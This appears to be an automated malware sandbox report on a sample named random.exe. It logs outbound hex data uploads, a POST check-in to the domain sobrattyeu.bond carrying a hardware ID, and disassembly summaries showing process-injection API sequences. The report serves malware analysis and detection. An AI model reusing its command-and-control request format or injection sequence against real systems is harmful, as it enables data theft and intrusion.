2025-01-14 10:18:08 UTC	15331	OUT	Data Raw: a1 f9 4f 6d ff 18 c6 1a 23 63 55 93 83 30 c8 f2 39 99 49 48 0f 84 24 b7 e6 b4 5d e3 13 45 f7 1b 1a 3f 34 7e 1f 32 19 45 56 be e7 60 0b e5 19 20 d4 15 be 1a b5 0c f9 12 e3 13 82 e6 56 0b 57 dd 4b a0 29 e7 82 a7 96 7f e8 33 6f 34 34 cd a0 6b f0 b9 9e d0 5d f5 1f f8 be d8 63 4a c5 b8 b4 f0 80 12 7b 0f 41 81 60 29 fc e6 b5 49 eb 44 01 ca d2 a4 da f7 a4 b0 a8 0b 5b d1 c1 27 22 f7 d3 bd fe 90 29 6b 6b 73 41 85 ae e0 c8 e0 aa 22 a3 ef 8e 3d 12 1c 47 92 0f e3 fc 13 21 77 07 50 4b 6e 86 e0 20 ee 98 c4 28 c5 9f bd a1 04 68 47 50 b0 8f 5b f8 3b bf f1 ca a7 9a e0 84 c4 d6 4b 9f b1 64 87 96 4f 3a a0 78 7c 85 56 76 9c ca 1b 6f 0a 9a 2b ba bf 03 ba 75 0d 36 44 00 57 e4 a8 73 be f7 dc 0d f4 64 a3 c8 b8 c5 c0 17 3e d8 b1 f1 b3 dd 83 83 37 6e 9d fb e7 db 8d ca 17 d7 93 e6 Data Ascii: Om#cU09IH$]E?4~2EV` VWK)3o44k]cJ{A`)ID['")kksA"=G!wPKn (hGP[;KdO:x\|Vvo+u6DWsd>7n
2025-01-14 10:18:08 UTC	15331	OUT	Data Raw: bb 0d 75 e7 b6 a8 4f 28 9f 98 47 8a 8c 43 84 9b cd 09 ac 30 c4 f7 a7 71 c1 15 e1 46 94 7f e2 1c e2 65 80 92 72 29 ff 42 6d 47 30 42 5f 70 b6 36 83 21 b1 b5 aa 6f 3c a3 f4 7b b4 ca 78 ac b6 42 79 aa 37 41 05 9f 1d 17 81 29 dd 76 6b 23 d6 33 2b d9 19 83 59 df 0a 52 4d 15 e6 16 05 8f b4 44 b2 dc 17 7e e3 84 8f 44 5a da 4d e4 54 b4 69 c7 ad 71 9a 58 ee 05 4d 33 7c 73 cd e3 c6 57 ef 84 87 36 d7 8f ac fb 9a d2 02 44 db e4 52 23 ee f4 ae 6a 91 bf fa 12 db 0c 3b c2 65 99 e7 6a f2 10 ed b8 09 c9 4c 69 1f c1 ea 53 6d 59 e8 ae 90 f8 19 07 80 21 24 7c 14 8e 87 c9 98 a3 2f 6d 74 73 69 50 f2 bb 3b 92 52 d7 63 09 2a 1e dd fa 32 81 1c b1 3d f3 cc 0d e3 da b4 dc 8c 2b ca 6a 9b 76 7d 09 81 29 9c 8f fc d8 1a bc 62 6c a6 7a 97 b7 e6 bb 8f 62 f5 a2 7e 28 d9 55 cf 62 8f 7d 93 Data Ascii: uO(GC0qFer)BmG0B_p6!o<{xBy7A)vk#3+YRMD~DZMTiqXM3\|sW6DR#j;ejLiSmY!$\|/mtsiP;Rc*2=+jv})blzb~(Ub}
2025-01-14 10:18:08 UTC	15331	OUT	Data Raw: fd 2a b0 76 c7 37 b4 f3 81 f8 59 ef 0e 9d be 48 b7 62 b1 97 af d2 03 5a 2c d0 e4 7f 60 0f e1 38 09 78 8f 4b 58 a9 2a 90 3a 2f ca e8 fc f3 84 ce d8 3e 0c 3b 12 6c 8a 71 7e a7 6d 9a f0 80 87 0f 65 1a a9 93 eb 87 23 a8 ff fd f1 9b 52 38 ff 4f 4e 84 18 df cd 24 33 d8 21 10 08 92 19 bf 02 55 19 65 a5 f4 a4 1b a4 0a d4 f4 45 ea 37 01 46 ba 84 38 1a 4e 7e 1c 47 e0 44 97 88 ad fc b6 0a 3f ea d1 c7 fb 15 e7 48 6d dc d5 8c df d3 ac bc 52 a7 95 a5 98 38 92 e4 92 8e 0e ef 33 3d 58 89 66 67 e3 d7 56 1c d7 84 05 76 0b e6 17 90 f5 b0 e2 1d 3f c7 c0 91 66 8a 22 42 b5 d8 3f 69 d5 cf d6 e5 06 b3 54 eb c0 fd 94 c3 71 9e fa f3 56 bd 91 5a 53 79 20 d9 bb d6 97 f0 3e 2a 52 73 83 85 97 a3 ae 0f 0b 30 3f b3 14 b3 88 c8 43 63 ee ea 59 59 bb 55 05 f0 4f 6d f9 32 5b 3a 3a 06 39 c7 Data Ascii: v7YHbZ,`8xKX:/>;lq~me#R8ON$3!UeE7F8N~GD?HmR83=XfgVv?f"B?iTqVZSy >*Rs0?CcYYUOm2[::9
2025-01-14 10:18:08 UTC	15331	OUT	Data Raw: 25 7f 9f 51 66 28 88 bc 02 74 3c c7 4f 3b 33 3a ac 43 c3 03 42 5e 72 4c 08 e2 78 03 25 26 b6 f8 06 19 45 0e c5 b1 84 fd 76 c6 11 c8 8f 1d 97 b7 3b 46 4c 2a 30 90 15 da b7 e7 1c cb fd d4 09 2f 31 1d b1 ed 9f cb 27 35 31 f7 e5 42 ef fc 3b 9d e4 3e 33 43 4a 5b 93 dc 4c f4 c6 ef 03 e7 3e 38 35 19 77 1e 04 2f 0f 27 79 f2 71 96 fa 60 6d ed d3 88 56 c4 35 85 60 c3 b4 2f ca fd dd 10 a2 c5 39 75 7c 50 31 f4 f2 bf b7 a0 0a 0b 9f 8b 0b 59 67 5d 02 71 a5 10 83 00 7f 0d c4 58 42 20 75 8e 51 68 93 79 41 42 d7 e8 07 94 59 fb 61 66 73 14 45 de fa d8 fe 78 a6 25 17 61 ee 2f da 95 2c c6 33 1e df f7 18 f1 1d 9a 21 a7 29 36 b9 cb 2e 9f 81 28 aa 3c e1 77 7f 4c f8 08 f9 0d fd 77 4f d0 f6 ff ed 8c cd 09 ff fb 5f 6a 0d 50 17 e5 8a 83 09 22 85 77 3d 2f 27 d3 37 05 58 8f 63 1f 7f Data Ascii: %Qf(t<O;3:CB^rLx%&Ev;FL*0/1'51B;>3CJ[L>85w/'yq`mV5`/9u\|P1Yg]qXB uQhyABYafsEx%a/,3!)6.(<wLwO_jP"w=/'7Xc
2025-01-14 10:18:08 UTC	15331	OUT	Data Raw: d6 17 f8 35 f9 c1 11 44 21 05 e8 b4 2d f0 e7 64 d4 92 b4 39 31 ac 8c 0a ae 18 a8 7a e7 ed b3 32 f4 59 6d 6b 9e 3d f6 9f b7 02 47 18 38 87 9d c1 82 58 5e a0 b9 d0 c2 e4 2f fe 73 1c 87 e2 79 a1 65 f7 39 66 c8 fe ab 90 6e 8d 74 ca b4 a0 4a 54 44 6f f6 66 84 bc 2a 42 9a 59 df 7c 92 1c 31 65 2e f8 ae 42 d3 64 40 c7 a3 24 f2 10 79 cd b3 43 6f fe 43 c1 01 13 bf df 38 23 3d ac 04 50 c1 46 99 02 f8 8a b5 3a 1a 8a c5 80 ad a7 d2 3a 2a 20 97 e0 6b a7 09 7d a4 c1 ad 97 21 86 a5 dc 4e 9c 08 83 99 e2 5d b7 67 5e 8c a7 6e 46 c3 27 41 32 41 dd 87 27 33 82 1c 62 e6 aa 38 cc 88 c7 c4 76 1c fb 92 77 a4 fa c6 45 f8 2d 7e e7 26 b3 9d 69 63 da 7c 33 72 11 07 9b dd 56 3a cd 60 53 0d 8a 53 c6 ef ee fd 72 7d 6e 33 b6 35 e9 81 dc 68 b2 12 93 b8 f9 d5 07 2c 7d db 5c 19 31 42 9d fe Data Ascii: 5D!-d91z2Ymk=G8X^/sye9fntJTDofBY\|1e.Bd@$yCoC8#=PF:: k}!N]g^nF'A2A'3b8vwE-~&ic\|3rV:`SSr}n35h,}\1B
2025-01-14 10:18:08 UTC	15331	OUT	Data Raw: e3 84 4d e6 d1 a8 f7 e2 5a e3 e0 5b ea 89 b4 10 89 4c e5 09 84 1d 93 62 1f fe 87 2f 4f 91 45 42 b0 4f 9e 2b fb dd 1f dc 7c 2f bf 66 d6 4e 9b a7 cf 4d ab 2c c1 88 1d 86 7b 3d f9 4e 52 c4 d1 49 2d 14 ed de 56 9b d8 68 d8 6f f4 4d bd e6 78 6f 76 76 5b 09 64 ed 20 c2 4f e1 df 90 c0 5f 75 88 fd 33 48 94 82 f1 88 b7 2d 6d 87 70 6a 0a 27 2f 35 bc 33 46 75 95 15 dd 53 c8 49 d4 1c e7 b8 be 4c c2 5b dd 23 cd 1a fa 61 af 9f 93 a1 25 7a 27 c0 6d a5 2c 81 a9 ce a9 02 7f d4 de 32 d7 41 9b 16 93 3c f3 76 03 84 24 78 1b 9c b8 8c bc b8 ef 45 61 22 8c 27 59 b9 a4 a3 83 e1 5b 2a cc 1c 1f 72 e5 d1 58 65 47 6a b7 a8 9b eb 17 ef bf eb 97 12 0e 8c 9e 28 b3 60 28 2f bc 37 2f a4 80 20 c6 af 40 43 c0 ec 7e 3a d7 c1 f5 9d f8 fe e6 c6 cd 8d 75 c7 94 54 ef 1a d7 a6 07 6e c3 d5 a1 1d Data Ascii: MZ[Lb/OEBO+\|/fNM,{=NRI-VhoMxovv[d O_u3H-mpj'/53FuSIL[#a%z'm,2A<v$xEa"'Y[*rXeGj(`(/7/ @C~:uTn
2025-01-14 10:18:08 UTC	15331	OUT	Data Raw: 86 11 e3 10 df 0e f7 8b 0f b1 97 ea 0c e4 f1 c5 a8 2b e9 84 bb 87 cd 5a bc 2f 3d 20 64 3a f9 b1 7f d3 2d b3 6b 80 5f 14 55 fb df 93 f1 e2 e0 90 e4 a3 dd 7e 83 c2 c5 c0 dd f1 ad 22 98 95 43 4c 90 f2 03 38 be e8 53 5f d4 69 a7 8f 93 be d2 9c 35 45 e9 4b 8d d1 4d 48 d4 40 5a 31 28 1c e2 43 04 28 42 ad 3d fd 16 e1 86 d6 ab 2d 96 52 e7 74 f1 ed 11 b4 00 ef 42 09 f0 14 26 be bb 20 4c ca 7d 84 5d 0c 5a eb 3f 12 63 e8 0f 76 a6 44 fa 9e 37 61 14 be 4b 5d b2 da 39 28 5f 74 b8 01 41 7a 82 86 a5 10 62 32 6f 4f 68 fd 94 f2 38 af bf 0a d9 b0 3e 62 02 33 9c 26 63 4e 07 37 0b a5 4f b7 65 cc 72 bd 9e f2 ca 7a f7 a0 fc 8c bf 24 7c fa ad 04 9d 44 c7 52 96 91 75 93 ae 71 48 e4 75 ce 40 d9 85 d3 34 b7 b4 e0 ba d0 be 93 44 84 89 06 a6 a8 83 3c 6b 23 ca fa 9e 95 11 51 e3 c2 6d Data Ascii: +Z/= d:-k_U~"CL8S_i5EKMH@Z1(C(B=-RtB& L}]Z?cvD7aK]9(_tAzb2oOh8>b3&cN7Oerz$\|DRuqHu@4D<k#Qm
2025-01-14 10:18:08 UTC	15331	OUT	Data Raw: 8a 38 9e da 69 ed 2d 70 91 23 9b 8d 27 e2 15 06 58 63 41 05 5e 66 31 71 d1 b7 2a ac bb 54 07 5b e1 df 2b e2 fb 62 37 c4 6e 76 b3 54 79 83 2a d5 a2 bf 37 99 71 9b f3 1f 5a 8f 0d 3f 74 8f 0a 71 22 d4 ef ef 1f 51 5a 65 2a 87 27 84 a8 85 0c 95 45 21 e8 bb d3 e3 c3 40 59 18 df 0b 78 4d 7a 8e 9f f6 60 79 fd d7 30 6c fe db bb bc 0b e0 26 52 7f 1e 17 02 c7 de db 9b 11 9f 17 23 dd 9b 3e 54 18 fe ae 89 17 28 f8 96 cd 98 38 5c 30 ca 0d 9f 3c a0 47 9d 1c f3 38 fe a4 96 0c f4 c4 a6 01 c2 fd 52 41 19 54 50 51 8d a5 47 21 0b a0 85 cc e4 2e 80 d2 ee c7 d7 eb c2 fe 0f dd 99 ea 3f 62 f3 f9 ae 46 3b fd 28 38 84 d3 1f e0 67 4b 90 33 01 bc 54 86 fb 14 c1 2e c6 a9 bf 89 26 3f 58 da d6 52 bd f7 0b 85 1f 1d 65 84 14 5e 00 b8 61 15 90 62 77 c6 4f 34 80 9f 16 ac b7 8b 77 a7 89 b0 Data Ascii: 8i-p#'XcA^f1qT[+b7nvTy7qZ?tq"QZe*'E!@YxMz`y0l&R#>T(8\0<G8RATPQG!.?bF;(8gK3T.&?XRe^abwO4w
2025-01-14 10:18:08 UTC	15331	OUT	Data Raw: 2a 05 7a 4d 2a 50 1a 21 0e b2 11 84 de 9b 7b 58 c9 ad 3f 3e a5 5a 18 1f 58 9f 7a 94 84 d7 10 6e 7f 87 07 c6 49 9b e7 27 f8 ef 93 3f f2 6c 40 f5 81 16 81 f7 85 3a a1 de f3 8a 97 be c6 45 d2 6d 99 0b 11 ee 03 13 a6 7a 9f 83 69 9a e8 1a 23 e3 2e 5d 10 3a ff 73 3a c3 68 20 ea 93 36 c7 75 bc 65 dd a6 65 b3 83 6f 34 a6 55 10 e1 d3 43 fa 81 0b bc 7f cd f8 f5 16 a2 b1 09 fd b1 84 cd a2 ca 89 7a f7 81 64 de 8c 38 eb 57 4f 72 e5 9b c1 cd e7 95 eb 03 36 e5 b4 9b ac 5f 73 0a 05 b4 45 56 10 f7 9c 28 44 5b 1c 22 04 90 32 c3 3e 54 6e 16 8c b9 fa 30 42 b8 43 cd e2 41 d5 d8 88 ea 15 3c 75 60 c3 98 bd 91 20 cc 7d bb 91 ed bc 91 72 a1 78 fd de dc 5b 6b 16 75 ae c8 a4 ff 44 97 53 c9 00 c4 b0 ac 23 5d df 86 a4 7b 75 f0 1f 43 35 f6 9b d0 e1 aa ff dd 45 c3 b2 49 49 ff 7f c7 35 Data Ascii: zMP!{X?>ZXznI'?l@:Emzi#.]:s:h 6ueeo4UCzd8WOr6_sEV(D["2>Tn0BCA<u` }rx[kuDS#]{uC5EII5
2025-01-14 10:18:10 UTC	1137	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 10:18:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uckmiu4bqugl3jh6jdqa47cns5; expires=Sat, 10 May 2025 04:04:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dLAFN%2FgksZAaB66LsMBSdOA%2BGwXhqTR6L%2BMn0xnFghCmvIx9zuQI4q3m3iyeyZpeVNRVKDw7BLgWjvsOwf%2FJCFa7q2v8vkPB3qg45HFLMeKWXuUkhGnI77zNpsY7%2B%2BFKqpI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ce15e4b4e42c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1641&rtt_var=627&sent=192&recv=569&lost=0&retrans=0&sent_bytes=2837&recv_bytes=553969&delivery_rate=1727810&cwnd=212&unsent_bytes=0&cid=fb5f4027463227d9&ts=1605&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49722	104.21.96.1	443	5332	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 10:18:11 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: sobrattyeu.bond
2025-01-14 10:18:11 UTC	80	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 37 74 78 32 6a 6f 2d 2d 39 32 35 26 6a 3d 26 68 77 69 64 3d 43 46 30 45 35 37 45 42 37 30 44 46 31 44 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 Data Ascii: act=get_message&ver=4.0&lid=7tx2jo--925&j=&hwid=CF0E57EB70DF1D8FB960CC18D99B375A
2025-01-14 10:18:11 UTC	1123	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 10:18:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pelrjbg0giimccacc4j1jm54vo; expires=Sat, 10 May 2025 04:04:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2Bv8ROI%2BKOtyQHQQQfxjJgeVaOsIBPgK5Yn9nfoX4pxEfYO1tvpJhzQ77uYa9UZoBT3xo37c8nErH%2BNjTPkfBlM8YB57%2BEPTT6Ln8Q96zyeppRDjvFwbUrdXuemD7zpOrg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ce16bad1042c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1687&rtt_var=653&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=979&delivery_rate=1648785&cwnd=212&unsent_bytes=0&cid=1003062003ed1dff&ts=521&x=0"
2025-01-14 10:18:11 UTC	54	IN	Data Raw: 33 30 0d 0a 57 62 6d 51 58 6c 77 41 78 33 42 65 47 56 73 65 4e 73 2b 42 47 50 32 32 55 39 70 53 38 5a 4d 50 53 6e 58 4d 7a 6e 70 67 53 54 38 43 35 41 3d 3d 0d 0a Data Ascii: 30WbmQXlwAx3BeGVseNs+BGP22U9pS8ZMPSnXMznpgST8C5A==
2025-01-14 10:18:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:18:00
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\random.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\random.exe"
Imagebase:	0x620000
File size:	350'832 bytes
MD5 hash:	FFA93EB02619DB4261CA8E263FB667CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:18:01
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\random.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\random.exe"
Imagebase:	0xba0000
File size:	350'832 bytes
MD5 hash:	FFA93EB02619DB4261CA8E263FB667CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:18:01
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 912
Imagebase:	0xab0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	15.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	24.2%
Total number of Nodes:	33
Total number of Limit Nodes:	4

Executed Functions

Function 02A47F25 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A47E97,02A47E87), ref: 02A480BD
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02A480D0
Wow64GetThreadContext.KERNEL32(0000037C,00000000), ref: 02A480EE
ReadProcessMemory.KERNELBASE(00000370,?,02A47EDB,00000004,00000000), ref: 02A48112
VirtualAllocEx.KERNELBASE(00000370,?,?,00003000,00000040), ref: 02A4813D
WriteProcessMemory.KERNELBASE(00000370,00000000,?,?,00000000,?), ref: 02A48195
WriteProcessMemory.KERNELBASE(00000370,00400000,?,?,00000000,?,00000028), ref: 02A481E0
WriteProcessMemory.KERNELBASE(00000370,?,?,00000004,00000000), ref: 02A4821E
Wow64SetThreadContext.KERNEL32(0000037C,04E80000), ref: 02A4825A
ResumeThread.KERNELBASE(0000037C), ref: 02A48269

Strings

VirtualAlloc, xrefs: 02A47FEC
ResumeThread, xrefs: 02A48061
GetThreadContext, xrefs: 02A47FFF
aryA, xrefs: 02A47F6B
TerminateProcess, xrefs: 02A4814C
Load, xrefs: 02A47F63
CreateProcessW, xrefs: 02A47FD9
ReadProcessMemory, xrefs: 02A48012
GetP, xrefs: 02A47FA7
VirtualAllocEx, xrefs: 02A48025
SetThreadContext, xrefs: 02A4804B
WriteProcessMemory, xrefs: 02A48038
ress, xrefs: 02A47FAF

Memory Dump Source

Source File: 00000000.00000002.2085681500.0000000002A47000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a47000_random.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-232383841
Opcode ID: fb7b6201eaedee4635523f204421a04f1d545bd862ac4ba91bf339366d457fff
Instruction ID: c3576c2c8f79348a770c32e607668e7f8bac8d387b64bb5c9b519ca48cbd1fb0
Opcode Fuzzy Hash: fb7b6201eaedee4635523f204421a04f1d545bd862ac4ba91bf339366d457fff
Instruction Fuzzy Hash: 3DB1E77664064AAFDB60CF68CC80BDAB3A5FF88714F158125EA08AB341D774FA51CB94

Function 02A480A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A47E97,02A47E87), ref: 02A480BD
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02A480D0
Wow64GetThreadContext.KERNEL32(0000037C,00000000), ref: 02A480EE
ReadProcessMemory.KERNELBASE(00000370,?,02A47EDB,00000004,00000000), ref: 02A48112
VirtualAllocEx.KERNELBASE(00000370,?,?,00003000,00000040), ref: 02A4813D
WriteProcessMemory.KERNELBASE(00000370,00000000,?,?,00000000,?), ref: 02A48195
WriteProcessMemory.KERNELBASE(00000370,00400000,?,?,00000000,?,00000028), ref: 02A481E0
WriteProcessMemory.KERNELBASE(00000370,?,?,00000004,00000000), ref: 02A4821E
Wow64SetThreadContext.KERNEL32(0000037C,04E80000), ref: 02A4825A
ResumeThread.KERNELBASE(0000037C), ref: 02A48269

Strings

TerminateProcess, xrefs: 02A4814C

Memory Dump Source

Source File: 00000000.00000002.2085681500.0000000002A47000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a47000_random.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: TerminateProcess
API String ID: 2687962208-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: 007d4dcf991987f58961f9866b151321299c91ddd129bbbb9fd01ae91faa78cc
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: CD31F972240646AFD734CF98CC91FEA7365BFC8B15F148509EB19AF284C6B4FA018B94

Function 028327A0 Relevance: 1.7, APIs: 1, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2085419836.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2830000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e62485bba1e7255c5a09f379246353fb250649371f45c8f74eec5c4d1b70c654
Instruction ID: 0813800c8fbc522ef4dde9c60fa9d91983c8e59612ff1a9a32bdbd58ad4982de
Opcode Fuzzy Hash: e62485bba1e7255c5a09f379246353fb250649371f45c8f74eec5c4d1b70c654
Instruction Fuzzy Hash: 42A129789041599FCB05CFA9C480AEDFBF1BF49315F28D659E858E7256C330AC81CBA4

Function 02832028 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02832A69

Memory Dump Source

Source File: 00000000.00000002.2085419836.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2830000_random.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0cb44c801e48580ab41f66a7f80d6ec24330bef010b1903e3695ae3a610750f0
Instruction ID: 63fbdcbc9d54e337634a78026ee2eafcbe44d0071dcad07b488f458391fb712c
Opcode Fuzzy Hash: 0cb44c801e48580ab41f66a7f80d6ec24330bef010b1903e3695ae3a610750f0
Instruction Fuzzy Hash: 3221F2B5D00619AFCB00DF9AC884ADEFBB4FB08314F10812AE918A7200C3B4A954CFE5

Analysis Process: random.exePID: 5332, Parent PID: 2472COMMON

Execution Graph

Execution Coverage:	8.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	62.5%
Total number of Nodes:	368
Total number of Limit Nodes:	30

Executed Functions

Function 0043B7B0 Relevance: 23.6, APIs: 11, Strings: 2, Instructions: 851
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(7F7E7D64,00000000,00000001,D3D2D1DD,00000000,?,D3D2D1DD,?,?,?), ref: 0043BB57
SysAllocString.OLEAUT32 ref: 0043BBE2
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,D3D2D1DD,?,?,?), ref: 0043BC20
SysAllocString.OLEAUT32 ref: 0043BC67
SysAllocString.OLEAUT32 ref: 0043BD1F
VariantInit.OLEAUT32(?), ref: 0043BD8D

Strings

qn, xrefs: 0043BCD0
./, xrefs: 0043BDC6

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: ./$qn
API String ID: 65563702-3823645636
Opcode ID: 33e9290a913fd713dbdf346d1838c108140739e0934d6ef781ef464a85dd720d
Instruction ID: 2f0884b81ea7a4518840af457542ae1764f48caff3a768fe7da6a1d928f758ff
Opcode Fuzzy Hash: 33e9290a913fd713dbdf346d1838c108140739e0934d6ef781ef464a85dd720d
Instruction Fuzzy Hash: 1F52E172A083508FD718CF28C89176BBBE2EFC9310F14992EE6D59B391D7759805CB86

Function 00423E44 Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 429
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 00423E6A

Strings

P5Y7, xrefs: 004242D3
<QrS, xrefs: 0042430B
4Y>[, xrefs: 0042431B
d)E+, xrefs: 004242FB
UW, xrefs: 004240AE, 004240B2
H%Z', xrefs: 004242F3
Y1\3, xrefs: 004242CB
A!K#, xrefs: 004242EB
]_, xrefs: 00424070
O-O/, xrefs: 00424303

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 4Y>[$<QrS$A!K#$H%Z'$O-O/$P5Y7$Y1\3$d)E+$UW$]_
API String ID: 237503144-2105826625
Opcode ID: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
Instruction ID: 7b8528e6acc013927f719d16868986943a9a1bba7e440ced0a90d285d0ff4e0a
Opcode Fuzzy Hash: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
Instruction Fuzzy Hash: 24D1EAB0608361DBC310CF55E88126BBBF0EF95354F448A2EF9D99B351E3789906CB96

Function 00436590 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 004365D0
GetSystemMetrics.USER32 ref: 004365E0
DeleteObject.GDI32 ref: 00436623
SelectObject.GDI32 ref: 00436673
SelectObject.GDI32 ref: 004366CA
DeleteObject.GDI32 ref: 004366F8

Strings

phC, xrefs: 00436790
, xrefs: 004366A1
AnC, xrefs: 00436743

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID: $AnC$phC
API String ID: 3911056724-4014303587
Opcode ID: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
